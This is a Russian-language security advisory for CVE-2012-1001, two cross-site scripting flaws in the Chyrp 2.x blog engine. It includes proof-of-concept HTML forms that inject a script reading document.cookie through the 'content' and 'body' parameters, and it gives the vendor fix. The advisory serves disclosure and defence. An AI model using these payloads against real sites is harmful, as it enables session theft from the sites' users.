Уязвимости Межсайтовый скриптинг в Chyrp
| Дата публикации: | 22.02.2012 |
| Дата изменения: | 24.02.2012 |
| Всего просмотров: | 633 |
| Опасность: | Средняя |
| Наличие исправления: | Да |
| Количество уязвимостей: | 2 |
| CVSSv2 рейтинг: |
(AV:N/AC:M/Au:N/C:N/I:P/A:N/E:P/RL:O/RC:C) = Base:4.3/Temporal:3.4 (AV:N/AC:M/Au:N/C:N/I:P/A:N/E:P/RL:O/RC:C) = Base:4.3/Temporal:3.4 |
| CVE ID: | CVE-2012-1001 |
| Вектор эксплуатации: | Удаленная |
| Воздействие: | Межсайтовый скриптинг |
| CWE ID: | Нет данных |
| Наличие эксплоита: | Нет данных |
| Уязвимые продукты: | Chyrp 2.х |
Описание:
Уязвимость позволяет удаленному пользователю произвести XSS нападение.
1. Уязвимость существует из-за недостаточной обработки входных данных в параметре "content" в сценарии /includes/ajax.php. Удаленный пользователь может с помощью специально сформированного запроса выполнить произвольный код сценария в браузере жертвы в контексте безопасности уязвимого сайта.
Пример:
<form action="http://[host]/includes/ajax.php" method="post">
<input type="hidden" name="action" value="preview" />
<input type="hidden" name="feather" value="" />
<input type="hidden" name="field" value="" />
<input type="hidden" name="content" value='<script>alert(document.cookie);</script>' />
<input type="submit" id="btn">
</form>
2. Уязвимость существует из-за недостаточной обработки входных данных в параметре "body" в сценарии /includes/error.php. Удаленный пользователь может с помощью специально сформированного запроса выполнить произвольный код сценария в браузере жертвы в контексте безопасности уязвимого сайта.
Пример:
<form action="http://[host]/includes/error.php" method="post">
<input type="hidden" name="ajax" value="1" />
<input type="hidden" name="body" value='<script>alert(document.cookie);</script>' />
<input type="submit" id="btn">
</form>
URL производителя: http://chyrp.net/
Решение: Установите последнюю версию 2.1.2 или 2.5 Beta 2 с сайта производителя.
Ссылки:
http://chyrp.net/2012/02/02/heres-whats-been-going-on-recently/
Подписка
Вирусы